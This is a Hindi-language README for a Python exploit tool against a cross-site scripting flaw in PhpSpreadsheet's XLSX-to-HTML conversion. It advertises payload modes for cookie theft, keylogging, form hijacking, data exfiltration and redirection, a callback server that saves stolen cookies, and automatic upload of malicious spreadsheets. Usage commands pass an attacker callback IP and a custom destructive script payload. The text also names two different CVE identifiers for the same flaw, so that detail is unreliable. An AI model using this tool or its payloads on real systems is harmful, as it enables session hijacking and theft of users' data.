
यह CVE-2024-47875 PhpSpreadsheet XSS Vuln के लिए एक PoC/Exploit है।
यह CVE-2025-22131 पर एक PoC है, जो PhpSpreadsheet के 2.2.2, 2.1.2 और 1.29.4 से पहले के संस्करणों में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह भेद्यता generateNavigation() फ़ंक्शन में मौजूद है, जो XLSX-to-HTML रूपांतरण के दौरान शीट नामों को सैनिटाइज़ करने में विफल रहता है, जिससे दुर्भावनापूर्ण जावास्क्रिप्ट इंजेक्शन सक्षम होता है।
CVE ID: CVE-2024-47875
GitHub Advisory: GHSA-79xx-vf93-p7cx
Affected Versions: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
लेखक: Roj
लाइसेंस: MIT
भंडार: PoC भंडार
📄 अनुकूलन योग्य XSS पेलोड के साथ दुर्भावनापूर्ण XLSX फ़ाइलें उत्पन्न करता है
🛠️ कई पेलोड प्रकारों का समर्थन करता है:
cookie_theft: सत्र कुकीज़ चुराता है
redirect: उपयोगकर्ताओं को हमलावर-नियंत्रित साइट पर पुनर्निर्देशित करता है
alert: PoC के लिए एक परीक्षण अलर्ट प्रदर्शित करता है
keylogger: कीस्ट्रोक्स कैप्चर करता है
form_hijack: फॉर्म सबमिशन को इंटरसेप्ट करता है
data_exfil: निर्दिष्ट एंडपॉइंट से डेटा बाहर निकालता है
🌐 एक्सप्लॉइट कॉलबैक कैप्चर करने के लिए अंतर्निहित HTTP सर्वर
⬆️ लक्ष्य एंडपॉइंट पर दुर्भावनापूर्ण XLSX फ़ाइलें अपलोड करता है
💾 कैप्चर किए गए डेटा (जैसे, कुकीज़) को JSON फ़ाइल में सहेजता है
🎨 बेहतर पठनीयता के लिए रंगीन टर्मिनल आउटपुट
🔍 डिबगिंग के लिए वर्बोज़ लॉगिंग
python exploit.py -h
🚀 उपयोग उदाहरण:
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50
# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
मैं प्रतिक्रिया प्राप्त करना चाहता हूँ, आप सभी को शुभकामनाएँ।